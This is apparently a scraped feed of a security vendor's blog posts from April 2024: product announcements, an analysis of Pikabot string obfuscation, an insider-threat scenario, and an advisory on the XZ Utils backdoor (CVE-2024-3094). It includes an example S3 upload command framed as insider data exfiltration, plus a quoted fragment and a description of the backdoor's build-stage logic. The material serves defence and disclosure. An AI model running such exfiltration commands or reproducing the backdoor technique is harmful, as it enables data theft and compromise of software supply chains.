Blogs Feed Zscaler Blog — News and views from the leading voice in cloud security. en Zscaler Announces Intent to Acquire Airgap Networks to Extend Zero Trust SASE Leadership and Eliminate the Need for Firewall-based Segmentation OverviewToday, Zscaler has announced the next major step in its Zero Trust SASE leadership by signing an agreement to acquire Airgap Networks, which provides agentless segmentation for enterprise IT and OT environments. With this acquisition, Zscaler will combine its Zero Trust SD-WAN with Airgap to extend the Zero Trust Exchange to protect east-west traffic in branch offices, campuses, factories and plants with critical OT infrastructure. This next step in our SASE leadership will eliminate the need for east-west firewalls, NACs and microsegmentation and deliver greater operational simplicity. Controlling lateral movement is the cornerstone of Zero TrustTo understand why today’s news is important, let’s reflect on challenges that organizations face in combating attackers. Adversaries are becoming faster and ever more effective at evading even the most sophisticated security controls with AI-enhanced social engineering and identity-based attacks. Once they compromise an organization, they then move laterally to get to sensitive data or critical resources. Once the targets or crown jewels (typically high value data) have been identified and reached, the goal is to exfiltrate the data as quickly and quietly as possible. While Zero Trust cannot be achieved without a holistic strategy that addresses every stage of this typical cyber attack chain - also known as a defense-in-depth approach - restricting lateral movement, and proper containment of the adversary once your organization has been compromised, is where real Zero Trust technologies must prove their worth. To date, the primary vehicle for addressing lateral movement on local area networks has been network-based segmentation and microsegmentation. How traditional segmentation and firewalls have fallen shortSegmentation has been carried out with aging, IP-centric networking technologies like NAC and east-west firewalls, managed through complex constructs like ACLs based on MAC, IP addresses and VLANs. This complexity places considerable strain on network operations teams forced to write, maintain and update countless ACLs or internal firewall rules while addressing the inevitable misconfigurations that break business critical applications or leave gaps in segmentation coverage. The complexity that east-west firewalls bring means most segmentation projects are never fully implemented and, even those with partial completion quickly experience segmentation policy drift as workloads and applications move and organizations’ environments change. The significance of a ‘network of one’Why is Airgap’s technology so compelling? Their agentless, identity-based approach to segmentation is a total re-think of the complexity of legacy segmentation approaches, for stronger, more predictable segmentation outcomes and greater operational simplicity. This highly secure but simplified approach includes Dynamic Host Configuration Protocol (DHCP) proxy, which creates a "network of one" for all connected endpoints, including those enabled with static IP. For example, the DHCP proxy intercepts all DHCP requests from devices trying to join the LAN. This enables Airgap to assign a /32 IP address and default gateway, effectively creating a segment of one. Airgap can then dynamically control access through continuous assessment of identity and context. Now, Airgap can provide visibility and policy enforcement at every connected endpoint without adding any software to those sensitive endpoints. This approach eliminates the risk of east-west lateral movement on local networks as well as the complexity of traditional segmentation approaches like east-west firewalls, without hardware upgrades or operational disruption. Agentless SegmentationIt is critical to understand that an agentless approach is essential for effective east-west segmentation on LANs, given that in many scenarios, be it unmanaged devices, aging legacy servers, or headless IoT/OT infrastructure, deploying agents is an impossibility. However, with Airgap, Zero Trust segmentation is possible in campus LAN and OT environments, no matter the device. Comprehensive Zero Trust Segmentation If you have been a customer or followed Zscaler, you’ll know we take segmentation very seriously, as a measure to counter lateral movement of threats. In the Zero Trust Exchange, we currently protect thousands of organizations with Zero Trust Segmentation which comprises multiple methods of segmentation depending on the environment and scenario. This includes Zero Trust SD-WAN to securely connect locations and segment them without site-to-site VPNs. Zero Trust Segmentation is made up of: User-to-app segmentation: Users access private applications directly, without being put on a network. Location Segmentation: Zero Trust SD-WAN ensures connections are made directly to applications from an office, rather than connecting to a routable network. No more site-to-site VPNs Workload segmentation: Least-privilege access segments cloud workload-to-workload communications across hybrid and multi-cloud environments. Now with Airgap, we further extend Zero Trust Segmentation to deliver visibility and segmentation for east-west traffic on LANs, including critical OT environments. Some of the use cases that can be addressed on day one are: East-West Firewall Replacement We will extend Zero Trust to the LAN by enforcing segmentation on east-west traffic. This shrinks the internal attack surfaces and eliminates the threat of lateral movement on campus, data center, and OT networks. There is no need for NAC or firewall-based segmentation. To enforce zero trust segmentation on campus, branch, and data center networks, Airgap will: Automatically provision every device into a segment of one (/32) Auto group devices, users and apps by analyzing the traffic patterns. This prevents rogue devices using MAC spoofing to get on to the network. Dynamically enforce policies for east-west traffic based on identity and context of users and devices. IT/OT SegmentationAirgap’s technology acts as a ransomware kill switch, disabling non-essential device communication to halt lateral threat movement without interrupting business operations. Airgap’s solution neutralizes advanced threats, such as ransomware on IoT devices, OT systems, and agent-incapable devices. To secure IoT and OT, Airgap will: Autonomously group and enforce policy for known MAC addresses on any device; eg. RDP access to cameras denied except for Admins Automatically isolate unknown MAC addresses to limit blast radius in case of a compromised device. Integrate with asset management systems for secure access control policies. Automatic Device Discovery & ClassificationA significant portion of IT/OT traffic stays within the factory or campus, hence it is important to have continuous visibility into east-west traffic. With automatic device discovery and classification, network admins can better manage performance, uptime and security for IoT/OT systems without complex inventory management. For network and device visibility, Airgap will: Discover, classify and inventory IoT/OT devices without the need for endpoint agents Get a baseline of traffic patterns and device behaviors in order to determine authorized and unauthorized access. Gain AI-driven network insights for performance management and threat mapping. Modern segmentation for the enterprise, without the complexity Eliminate lateral threat movement across the LANs. Reduce operational complexity and cost associated with legacy segmentation tools. Gain enhanced visibility into east-west traffic with discovery, classification and device inventory without the need for endpoint agents. We invite you to learn more about Airgap’s technology in an upcoming briefing on April 16th. Thu, 11 Apr 2024 05:00:00 -0700 Naresh Kumar Zscaler is showcasing Zero Trust + AI at the 2024 AWS Summit events across Europe In today’s dynamic digital landscape, organizations are rapidly adopting artificial intelligence (AI) and Generative AI (GenAI) tools to increase productivity, gain new insights, and obtain a competitive advantage. The newly released Zscaler ThreatLabz 2024 AI Security Report sheds light on key trends, risks, and best practices in enterprise AI adoption, along with insights into AI-driven threats and key strategies to defend against them. Analyzing over 18 billion transactions from April 2023 to January 2024 across the Zscaler Zero Trust Exchange cloud security platform, some of the key findings are: Enterprise use of AI/ML tools has skyrocketed by nearly 600% 569 terabytes of enterprise data exchanged with AI tools ChatGPT usage has increased by 634%, even though it is also the most-blocked AI application by enterprise organizations AI is empowering threat actors in unprecedented ways This is not just a numerical phenomenon but represents a profound shift in the way organizations across industries and geographies are embracing AI technologies. However, with terabytes of data sent to various AI tools, the need for effective data protection measures is a top priority. Not only driven by the need to classify and protect sensitive data to prevent it from leaving the organization by mistake, but also to prevent data exfiltration caused by bad actors, malware, and new AI-powered threats. Never has the demand for robust cybersecurity been more important.Zscaler Leadership and Advantage: In AI, Data Wins Enabling more secure use of AI and GenAI tools in organizations and using AI to provide a stronger security posture are two crucial aspects in the modern landscape. An AWS Advanced Technology Partner, Zscaler has been a leader in zero trust for over a decade. As organizations wage the battle against cyberattacks, they must deploy robust defense systems, including zero trust architectures that utilize AI to effectively combat evolving threats, while keeping users productive. The best AI is powered by the best data, and that is what makes Zscaler stand out. Operating the world's largest security cloud and processing over 400 billion transactions daily, Zscaler ensures access to the most relevant cyber threat data. Prioritizing three key elements for effective enterprise AI – vast datasets exceeding 500 trillion daily signals, deep domain expertise, and a skilled team of data scientists, Zscaler leverages complete logs, full URL and anonymized data to train their LLMs. This approach ensures rich data for AI training, unlike DNS and firewall logs, which often lack detail or are blind to encrypted traffic. As a result, Zscaler continually improves its AI models with high-volume, high-quality data, empowering IT and security teams with valuable insights and solutions. Come and visit us at the 2024 AWS Summit events As apps move to the cloud, cyberattacks become more sophisticated, and users work from anywhere, using any device, perimeter security using VPNs and firewalls provide incomplete, inconsistent security and a poor user experience. With the Zero Trust Exchange powered by AI, Zscaler provides comprehensive visibility, control, and security for all cloud based applications within a unified platform. At the 2024 AWS Summit events, you can discover how Zscaler empowers organizations to: Improve security posture with zero trust Reduce attack surface and prevent lateral threats Accelerate migration of on-prem apps to AWS Enjoy fast, direct access to private apps and workloads Deploy AI-powered security for sensitive data, workloads, and GenAI data And more Visit us at the 2024 AWS Summit events, which include EMEA stops at: Amsterdam on April 9 London on April 24 Berlin on May 15-16 Milan on May 23 Stockholm on June 4 Madrid on June 5 The 2024 AWS Summits are free events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Stop by our booth to learn more about Zscaler solutions for AWS and how to safely embrace GenAI tools, while leveraging AI for an improved security posture. To learn more about the 2024 EMEA AWS Summit events and to register, click here. And to learn more about Zscaler solutions for AWS visit our website. Tue, 09 Apr 2024 02:07:52 -0700 Yaroslav Rosomakho Automating Pikabot’s String Deobfuscation IntroductionPikabot is a malware loader that originally emerged in early 2023 with one of the prominent features being the code obfuscation that it leverages to evade detection and thwart technical analysis. Pikabot employed the obfuscation method to encrypt binary strings, including the address of the command-and-control (C2) servers. In this article, we briefly describe the obfuscation method used by Pikabot and we present an IDA plugin (with source code) that we developed to assist in our binary analysis. As mentioned in our previous article, the obfuscation method was removed when Pikabot remerged with a new version in early 2024. As of April 2024, this obfuscation method has not been used again in any Pikabot samples. Key Takeaways Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023. Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms. Previously, the strings were encrypted using a combination of AES-CBC and RC4 algorithms. The string obfuscation’s implementation is similar to ADVobfuscator. In this article, we describe the binary strings’ obfuscation algorithm and our approach to decrypt the binary strings using IDA’s microcode. Zscaler ThreatLabz developed an IDA plugin to automatically decrypt Pikabot’s obfuscated strings and are releasing the source code. Technical AnalysisStrings obfuscationThe steps for decrypting a Pikabot string are relatively simple. Each string is decrypted only when required (in other words, Pikabot does not decrypt all strings at once). Pikabot follows the steps below to decrypt a string: Pushes on the stack the encrypted string array. Initializes the RC4 encryption algorithm. The RC4 key is different for each string (with very few exceptions). Pikabot takes the decrypted RC4 output, decodes it using Base64 after replacing all instances of the character ‘_’ (underscore) with ‘=’ (equal) and decrypts it using the AES-CBC algorithm. The AES key and initialization vector (IV) are the same for all strings. ANALYST NOTE: There are encrypted strings, which are encrypted only with the RC4 algorithm. Figure 1 shows the code used to decrypt the string, Kernel32.dll. Figure 1: Example Pikabot string decryption for Kernel32.dll.Figure 2 shows the function that first decrypts the AES key and IV. The RC4 decrypted string passed to the function is then Base64 decoded, and is finally decrypted using AES. Figure 2: Pikabot Base64 decoding and AES decryption function. Decrypting Pikabot stringsThe following information is required to decrypt a Pikabot string: The AES key and IV of a binary sample. The RC4 encrypted array of each string. The RC4 key of each encrypted string. The string’s size. Our approach relies on IDA’s microcode. This decision helped us with several problems such as: IDA’s microcode converts the assignment/copy of the RC4 key into a strcpy function. In the assembly level, this could either be multiple mov or rep instructions. As a result, it would make the detection and extraction harder and more challenging. Extracting the RC4 encrypted array. Since IDA reconstructs the stack, it makes it much easier to search and extract the encrypted array. IDA’s microcode brings other limitations (for example, decompilation failure for a function) but no such issues were encountered for the parts of the code we wanted to analyze. In the sections below, we describe how each component was extracted. Extracting the AES key/IVFor the extraction of the AES key and IV, we iterate all analyzed functions and discard any function, whose size is not in the range of 600 and 1,600 bytes. Next, we scan the functions for the following patterns: Existence of RC4 encryption. This is the same heuristic we use for detecting encrypted RC4 strings. Existence of values 0x3D and 0x5F (used before Base64 decoding the string) that are used with microcode opcodes m_stx and m_jnz respectively. Lastly, if all of the patterns above match, then the handler for decrypting a Pikabot string is invoked. For the classification of the key and the IV, we apply the following checks: The number of decrypted strings from the identified function must be two. Otherwise, the identified function is incorrect. The longest string is marked as the AES key (by taking the first 32-bytes) and the remaining decrypted string as the IV (by taking the first 16-bytes). Extracting the RC4 encrypted arrayPikabot constructs the RC4 encrypted array by pushing it onto the stack and then decrypting it. Our approach involves the following steps for detecting each part of the array: Use the detected RC4 encryption block address as a starting point. Search for the microcode opcode m_add in the decryption instruction. The detected microcode holds the starting stack offset of the encrypted array. Start iterating backwards and search for the microcode opcodes m_mov/m_call, the second opcode is used in case the data is copied via a strcpy or memcpy instruction. If the stack offset matches, then we save the data and update the stack offset. This process is repeated until the reconstructed encrypted array has the expected size. Extracting the RC4 encrypted array sizeThe length of the encrypted array is extracted in a similar way as the encrypted array. The detection pattern is: Use the detected RC4 encryption block address as a starting point. Search for the microcode opcodes m_jb, m_jae, and m_setb, and use the immediate constant number in the instruction as a size. Extracting the RC4 keyExtracting the RC4 key of each string proved to be the most challenging part while creating the plugin. In our first attempt, we were extracting the RC4 key after detecting the initialization of the RC4 algorithm. However, this approach had the following issues: Incorrect extraction of the RC4 key: In many cases, an invalid/junk string was placed in-between the correct RC4 key and the RC4 algorithm initialization. Incorrect detection of RC4 initialization code block: For example, if the size of the encrypted array was 256 bytes then an incorrect RC4 key would be detected. Instead of trying to detect the RC4 key by detecting the initialization of the RC4 algorithm, we decided to extract all strings from each targeted function. Then, we decrypted the RC4 encrypted array with each extracted RC4 key and validated the decrypted output by applying the following checks: If it matches the expected string size. If all characters of the string are readable. ANALYST NOTE: After successful decryption, the RC4 key is marked and not reused in order to limit any false-positives. For example, if the decrypted string does not have any junk characters. IDA PluginWe tested our Pikabot plugin with IDA versions 8 and newer. The plugin can be executed by compiling the source code using IDA's SDK and/or copying the generated DLL into the IDA plugins folder. After a Pikabot sample is loaded, the user can decompile a function and right-click in the decompiled output and either choose to decrypt strings in the current function or in all of them (Figure 3). Figure 3: IDA Pikabot plugin options. For each decrypted string, the plugin sets a comment in the decompiled output. Figure 4 shows a function with the obfuscated strings before the plugin is invoked. Figure 4: Before running the Pikabot string decryption plugin. Figure 5 shows the output after our Pikabot IDA plugin is executed. Figure 5: Output after running the Pikabot string decryption plugin. Source CodeThe source code for our IDA plugin to deobfuscate Pikabot strings can be found at this GitHub repository. ConclusionOlder Pikabot variants include a string obfuscation implementation, which can make automation a complicated task. By using IDA’s microcode and developing our own plugin, we were able to speed up our analysis in most cases and analyze the code much faster. Since this technique is no longer used by Pikabot, we decided to open source our IDA plugin to assist the research community with defeating current and future stack-based obfuscation techniques. Zscaler CoverageIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names: Win32.Trojan.PikaBot Win32.Downloader.PikaBot Indicators Of Compromise (IOCs)The following samples were used for testing the plugin. SHA256DESCRIPTIONaebff5134e07a1586b911271a49702c8623b8ac8da2c135d4d3b0145a826f507Pikabot Sample4c53383c1088c069573f918c0f99fe30fa2dc9e28e800d33c4d212a5e4d36839Pikabot Sample15e4de42f49ea4041e4063b991ddfc6523184310f03e645c17710b370ee75347Pikabot Samplee97fd71f076a7724e665873752c68d7a12b1b0c796bc7b9d9924ec3d49561272Pikabot Samplea9f0c978cc851959773b90d90921527dbf48977b9354b8baf024d16fc72eae01Pikabot Sample1c125a10c33d862e6179b6827131e1aac587d23f1b7be0dbcb32571d70e34de4Pikabot Sample62f2adbc73cbdde282ae3749aa63c2bc9c5ded8888f23160801db2db851cde8fPikabot Sampleb178620d56a927672654ce2df9ec82522a2eeb81dd3cde7e1003123e794b7116Pikabot Sample72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242Pikabot SampleAcknowledgmentsThe following projects were the initial inspiration for developing our plugin. In addition, they assisted with the usage of IDA’s SDK: HexRaysDeob - by Rolf Rolles Goomba - by Hex-Rays Mon, 08 Apr 2024 08:31:02 -0700 Nikolaos Pantazopoulos Join Zscaler for the Future of Digital Experience Monitoring Event It's time to register for the Future of Digital Experience Monitoring event. Here are a few reasons why you can’t miss it! See what it takes to keep end users productive no matter the device, network, or application.Zscaler Digital Experience (ZDX) is built on a foundation that goes beyond siloed monitoring solutions to provide full end-to-end visibility across devices (CPU, memory, Wi-Fi), networks (corporate or public internet), and applications (public or private). Zscaler Digital Experience end-to-end data path Find out what’s behind the high-confidence results delivered by advanced machine learning models.Machine learning models that provide high-confidence results require an immense amount of data and training, which can't be built overnight. ZDX is powered by the industry’s largest inline security cloud, with 500 trillion daily signals feeding high-quality data to sophisticated AI models. Zscaler Zero Trust Exchange Learn about key ZDX AI capabilities already making an impact for many service desk and network operations teams.Incident Dashboard includes machine learning models to detect issues across last mile and intermediate ISPs, application, Wi-Fi, Zscaler data center, and endpoints with correlation. This enables Network Operations to quickly and efficiently find root cause and focus on restoring reliable connectivity. ZDX Incidents Dashboard ZDX Self Service empowers users to fix problems that impact their digital experience, if the causes are under their control. A lightweight AI engine runs in Zscaler Client Connector and notifies the user of issues such as poor Wi-Fi or high CPU utilization, and then offers ways to resolve the issue, reducing help tickets. ZDX Self Service Notifications Automated Root Cause Analysis reduces strain on service desk and operations teams by identifying root causes of issues—such as high CPU usage, Wi-Fi latency spikes on local routers, slow application response times, and more—that would typically require expert IT knowledge and multiple dashboards. Users can get back to work more quickly and with fewer IT tickets, which tend to spike as users increasingly connect from anywhere using various devices, Wi-Fi access points, ISPs, zero trust environments, and applications. ZDX Automated Root Cause Analysis Join our upcoming webinar eventAs organizations strive to optimize digital experiences and ensure secure access to applications and data, the future of digital experience monitoring lies in leveraging advanced AI capabilities. With consolidated digital experience monitoring integrated in a zero trust architecture, IT teams can resolve issues more quickly to enhance performance, reduce costs, and deliver exceptional user experiences. Join our upcoming webinar to discover how ZDX can transform your organization's digital experience monitoring strategy and drive superior business results. Register now Dates and times: Americas: Thursday, April 25 | 11 a.m. PT EMEA: Tuesday, April 30 | 10 a.m. BST APAC: Tuesday, April 30 | 10 a.m. IST Featured speakers: Dhawal Sharma, SVP & GM, Product Management, Zscaler Javier Rodriguez, Sr. Director., Product Management, Zscaler Wed, 03 Apr 2024 08:03:01 -0700 Rohit Goyal Betrayal in the Cloud: Unmasking Insider Threats and Halting Data Exfiltration from Public Cloud Workloads Introduction In today’s digital world, safeguarding sensitive data, such as source code, is crucial. Insider threats are a worthy adversary, posing significant risk, especially with trusted employees having access to valuable repositories. This article explores how a fictitious software development company could use Zscaler security solutions to stop insider attempts to upload source code. By using Zscaler Workload Communications, the fictitious company detects and prevents unauthorized uploads, ensuring the security of its intellectual property. Insider Threat in the Cloud and How to Stop Them A fictitious software development company relies on its source code repository as the lifeblood of its operations. Trusted employees have access to this repository to facilitate collaboration and innovation. To mitigate the risk of insider threats, the fictitious company implements Zscaler security solutions. Let’s explore how our products thwart an insider’s attempt to upload source code to an unauthorized destination. Attack Chain Use Case StepsTrusted employee access: A trusted employee (insider) has access to the source code repository, enabling them to complete their job responsibilities. A simplified example of source code is shown below: Insider threat incident: The trusted employee with legitimate access decides to misuse their privileges by attempting to upload source code files to an unauthorized destination—an AWS S3 bucket, with the intention of unauthorized sharing. or user:~$ aws s3 cp sourcecode.c s3://bucket/uploads/sourcecode.c Figure 1: This diagram depicts how Zscaler blocks insider threats Integration with Zscaler Workload Communications: The fictitious company’s source code repository is configured to route all outbound traffic through Zscaler Workload Communications, ensuring that data transmissions undergo rigorous inspection and security policies are enforced. ZIA DLP engine implementation: ZIA leverages its powerful inline data loss protection (DLP) engine to analyze data traffic in real time. ZIA’s DLP policies are designed to identify and and prevent unauthorized attempts to upload source code files to external storage spaces. An example of DLP configuration options is shown below. Figure 2: An example of DLP configuration options. Detection and prevention of file upload attempts: As an insider attempts to upload source code files to the unauthorized AWS S3 bucket, ZIA’s DLP engine detects it as a violation of security policies. Leveraging advanced pattern recognition and behavior analysis, ZIA blocks the upload attempt in real time, preventing the exfiltration of company data. The figure below shows the source code file upload attempt failing in real time. Figure 2: The source code file upload command receives an error when executed The upload attempt, which was in violation of company policy, appears in descriptive log records, as shown below. Figure 3: A log showing the failed source code file upload, along with important details like user, location, and destination Alerting and response: The Zscaler security platform generates immediate alerts upon detecting the unauthorized upload attempt. How Zscaler Can HelpZscaler’s security products offer effective solutions against insider threats aimed at source code repositories: Outbound Data Violation TriggerBy routing through Zscaler’s Cloud Connector, organizations can enforce security policies on all outbound data transmissions, including those from source code repositories. This integration ensures that every upload attempt undergoes through security checks, regardless of the destination. Data Breach PreventionZscaler Internet Access (ZIA) features a powerful data loss prevention (DLP) engine that analyzes data in real time. Leveraging advanced DLP policies, ZIA can detect patterns indicative of unauthorized source code uploads. This approach enables organizations to prevent data breaches before they occur. Instant Alerts The Zscaler platform provides real-time monitoring of all network activity, including access to source code repositories. Any suspicious behavior, such as attempts to upload source code to unauthorized destinations, triggers immediate alerts. This allows security teams to respond promptly and prevent potential data exfiltration. ConclusionWith cybersecurity threats on the rise, organizations must combat insider risks effectively. Zscaler solutions offer proactive measures against insider threats, as demonstrated by the hypothetical use case outlined above. By implementing robust DLP policies and real-time monitoring, organizations can protect their critical data unauthorized access and maintain data integrity. The Zscaler platform equips organizations to tackle insider threats confidently, securing their digital assets effectively. Tue, 02 Apr 2024 13:31:17 -0700 Sakthi Chandra Exposing the Dark Side of Public Clouds - Combating Malicious Attacks on Workloads IntroductionThis article compares the cybersecurity strategies of a company that does not use Zscaler solutions with one that has implemented Zscaler's offerings. By exploring two different scenarios, we will highlight the advantages of Zscaler zero trust for workload communications and its specific use of data loss prevention. Threat Propagation Without Zscaler IntegrationLateral Movement Between WorkloadsIn the following scenario, you’ll see that without Zscaler’s integration, the organization is unable to detect or prevent threats effectively. This allows attackers to move laterally and exfiltrate data undetected, leading to significant security risks. Workload 1 in Azure West sends an HTTP GET request to GitHub for a patch update: Workload 1, deployed in Azure West, initiates an outbound connection to GitHub to fetch a required patch update. This HTTP GET request is sent to Github to download the patch: An HTTP response containing malware from GitHub: Unbeknownst to the organization, the HTTP response received from GitHub contains embedded malware. Attacker’s lateral movement to Workload 2: By exploiting the malware present in the HTTP response, an attacker gains access to Workload 1 and subsequently moves laterally to Workload 2 within the Azure West environment. From here, the attacker exploits vulnerabilities or misconfigurations in Workload 2 to achieve a network foothold and establish persistence in Workload 2 that further their malicious objectives. Data Exfiltration to a command-and-control (C2) server: With access to Workload 2, the attacker exfiltrates sensitive data from the organization’s environment to a remote C2 server. Threat Containment with Zscaler IntegrationIn the following scenario, Zscaler’s integrated security platform provides comprehensive protection against various stages of the attack life cycle. Organizations can use Zscaler Internet Access (ZIA), coupled with Zscaler Data Loss Prevention (DLP) and Zscaler Workload Communications to implement: Strict access controls Malware detection and prevention measures Workload segmentation Enhanced outbound security measures to GitHub (internet): With Zscaler integrated into the organization’s infrastructure, outbound traffic from Workload 1 to GitHub is subjected to stringent access control policies. Only approved URIs are permitted, which ensures communications are limited to trusted destinations. Any attempt to access unauthorized URIs is blocked. Malware detection and prevention: Zscaler’s security layers, including content inspection and advanced cloud sandbox features, intercept and inspect the HTTP response from GitHub in real time. Upon detecting malware, Zscaler halts transmission, preventing Workload 1 from being compromised. Workload segmentation to prevent lateral movement: Zscaler enforces strict segmentation policies ensuring that Workload 1 and Workload 2, which are deployed across two different regions, are treated as private applications with no direct communication allowed between them. Such segmentation effectively isolates these workloads, preventing any lateral threat movement between them. Egress traffic security from Workload 2 with advanced data protection: Egress traffic from Workload 2 is safeguarded using ZIA advanced protection capabilities. Zscaler ensures that sensitive data is not exfiltrated from the organization's environment. By enforcing DLP policies, Zscaler prevents unauthorized data transfers. ConclusionThe deployment of Zscaler’s solutions significantly enhanced the organization’s ability to combat cyberthreats and safeguard public cloud workloads. Without Zscaler, companies face unmonitored outbound traffic, susceptibility to malware infiltration, and the risk of lateral movement and data exfiltration. With Zscaler zero trust for workloads, organizations enjoy comprehensive protection, including access control policies, malware detection and prevention, segmentation to prevent lateral movement, and advanced data protection measures. Implementing Zscaler solutions enables organizations to bolster their cybersecurity defenses, mitigate risks, and protect their intellectual property from evolving threats in an interconnected digital environment. Tue, 02 Apr 2024 19:14:07 -0700 Sakthi Chandra CVE Advisory: CVE-2024-3094 - Security Compromise in XZ Utils IntroductionOn March 29th, a security incident surfaced involving XZ Utils, a widely utilized data compression package integrated into major Linux distributions. Malicious code, allowing unauthorized remote SSH access, was discovered within versions 5.6.0 and 5.6.1 of XZ Utils. This exploit has been formally identified as CVE-2024-3094 and assigned a critical CVSS score of 10. BackgroundXZ Utils fell victim to a sophisticated supply chain attack where attackers targeted the liblzma library, a crucial dependency utilized by OpenSSH. This attack allowed for the injection of code into an OpenSSH server, resulting in the potential for remote code execution (RCE). The liblzma build process employs a series of intricate obfuscations to extract a prebuilt object file from a disguised test file within the source code. This object file is then utilized to modify specific functions within the liblzma library. Any software utilizing this modified version of the liblzma library is susceptible to data interception, modification, and breaches. The malicious code was promptly discovered, and infected only the two most recent versions of the package, 5.6.0 and 5.6.1, both of which were released within the last month. Affected VersionsThe following table describes impacted distributions, along with a corresponding recommendation for each distribution. DistributionAffected SystemsAffected PackagesRecommendationAlpine LinuxEdge (active development) xz 5.6.1-r0 xz 5.6.1-r1 Upgrade immediately to the latest version, 5.6.1-r2.Arch LinuxN/A5.6.0-1, 5.6.1-1, and/or any release item that matches the following criteria: Installation medium 2024.03.01 Virtual machine images 20240301.218094 and 20240315.221711 Container images created between and including 2024-02-24 and 2024-03-28 Upgrade immediately to the latest version, 5.6.1-2.DebianDebianUnstable (aka “Sid”) *This is a testing, unstable, & experimental version. xz-utils 5.5.1alpha-0.1(uploaded on 2024-02-01), up to and including 5.6.1-1.Revert to 5.4.5 or upgrade to 5.6.1+really5.4.5-1. Note: No stable Debian versions are known to be impacted. Any compromised packages were part of Debian testing. KaliN/Axz-utils 5.6.0-0.2 and/or any Kali installation updates made between March 26th and March 29th.Apply the latest updates if you updated between March 26th and March 29th.openSUSE MicroOS Tumbleweed 5.6.0, and/or any updates that occurred between March 7th and March 28th.Revert to 5.4.x. Note: For Tumbleweed users, you also have the option to upgrade to a new Tumbleweed snapshot (20240328 or later) containing the reversed version 5.6.1.revertto5.4 Red Hat Fedora 40*, 41 Fedora Rawhide *Updated March 30, 2024: Fedora 40 beta does contain two affected versions of xz libraries - xz-libs-5.6.0-1.fc40.x86_64.rpm and xz-libs-5.6.0-2.fc40.x86_64.rpm. At this time, Fedora 40 does not appear to be affected by the actual malware exploit, but all Fedora 40 beta users are encouraged to revert to 5.4.x versions. xz-5.6.0 xz-5.6.1 Revert to 5.4.x. Note: RedHat has advised users to immediately stop any instances of Fedora 41 or Fedora Rawhide, until XZ packages are reverted to safe versions. Red Hat Enterprise Linux (RHEL) was not impacted by this vulnerability. Table 1: A table listing impacted distributions, operating systems, and packages, along with recommendations to address the vulnerability. Technical DetailsThe goal of the malicious backdoor implementing CVE-2024-3094 is to inject code into an OpenSSH server (SSHD) running on the victim's machine and allow remote attackers (who possess a certain private key) to send an arbitrary payload via SSH, which is executed before the authentication step and executes commands on the victim’s machine. This supply chain attack uses multiple stages to decrypt obfuscated payloads and modify the build process of the XZ Utils tools. The obfuscated/encrypted stages and later binary backdoor are hidden in these two test files: tests/files/bad-3-corrupt_lzma2.xz tests/files/good-large_compressed.lzma The figure below depicts the attack sequence an attacker could exploit. Figure 1: A diagram of the attack flow. The build process uses the following command to ensure that the victim’s system is running on Linux and possesses a x86_64 architecture: if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); thenIn addition, the build process checks whether the .rpm package is Debian or Red Hat-based. It also inspects certain environmental variables such as TERM and LANG. The TERM variable is set after SSH client and server authentication. The malicious payload verifies that the TERM variable is not set and that the LANG variable is set, and ensures that the running binary is /usr/sbin/sshd as it won’t be relevant with other binaries. After deciphering and decompressing the malicious payload over multiple stages, the payload is injected into liblzma. The payload modifies the behavior of the RSA_public_decrypt function, which is used in verification of signatures. The payload decrypts the RSA public modulus N value from the attacker’s request and decrypts it using the ChaCha20 symmetric stream cipher. The validation of the decrypted data is done using the Ed448 elliptic curve signing algorithm. Then, the decrypted payload is executed on the user’s SSH server. The backdoor contains only the public key, which ensures that only the attackers can generate valid payloads for the backdoor. The signature is bound to the host’s public key, meaning that a valid signature for one host cannot be reused for a different host. RecommendationsIn response to this threat, the Cybersecurity and Infrastructure Security Agency (CISA) has issued directives for affected individuals and organizations. XZ Utils developers and users are strongly advised to downgrade to a trusted, unaffected version of XZ Utils predating 5.6.0, such as 5.4.6 stable, or upgrade to a newer fixed version, if available. Additionally, thorough audits of system logs and network traffic are encouraged to identify any signs of suspicious activity. Any findings should be promptly reported to CISA for further investigation. How To Detect CVE-2024-3094To check if your version of XZ Utils is impacted (5.6.0 or 5.6.1) run the following command: $(which xz) --version | grep '5\.6\.[01]' Zscaler CoverageThe Zscaler ThreatLabz team has deployed protection.Zscaler Advanced Threat Protection: Linux.Exploit.CVE-2024-3094 Zscaler continues to monitor activities, through our telemetry data, potentially exploiting this vulnerability. References Mon, 01 Apr 2024 17:23:11 -0700 Varun Sandila New AI Insights: Explore Key AI Trends and Risks in the ThreatLabz 2024 AI Security Report Today, Zscaler ThreatLabz released its inaugural ThreatLabz 2024 AI Security Report. This report comes at a key inflection point: as AI tools and language models (LLMs) like ChatGPT weave their way into the fabric of enterprise life, questions around how to securely enable these AI tools and protect enterprise data remain unanswered. Complicating matters, AI is also driving a new generation of cyber threats, enabling adversaries to launch attacks at greater speed, sophistication, and scale. As a result, enterprises must take the right steps to both securely enable AI productivity tools within the business and leverage AI to defend against a new landscape of AI-driven threats. The Zscaler ThreatLabz 2024 AI Security report draws on more than 18 billion transactions in the Zscaler Zero Trust Exchange™, from April 2023 to January 2024. The report uncovers key trends, risks, and best practices in the ways that enterprises are adopting — and blocking — AI applications across industry verticals and around the world. Meanwhile, ThreatLabz also offers insight into the evolving AI threat landscape and real-world AI threat scenarios, before providing key security best practices for defending against them (including with AI). Download the Zscaler Zscaler ThreatLabz 2024 AI Security Report to uncover data-driven AI insights and enterprise best practices for securing AI. Key ThreatLabz AI FindingsExplosive AI growth: Enterprise AI/ML transactions surged by 595% between April 2023 and January 2024. Concurrent rise in blocked AI traffic: Even as enterprise AI usage accelerates, enterprises block 18.5% of all AI transactions, a 577% increase signaling rising security concerns. Primary industries driving AI traffic: manufacturing accounts for 21% of all AI transactions in the Zscaler security cloud, followed by Finance and Insurance (20%) and Services (17%). Clear AI leaders: the most popular AI/ML applications for enterprises by transaction volume are ChatGPT, Drift, OpenAI, Writer, and LivePerson. Global AI adoption: the top five countries generating the most enterprise AI transactions are the US, India, the UK, Australia, and Japan. A new AI threat landscape: AI is empowering threat actors in unprecedented ways, including for AI-driven phishing campaigns, deepfakes and social engineering attacks, polymorphic ransomware, enterprise attack surface discovery, exploit generation, and more. Enterprise decision 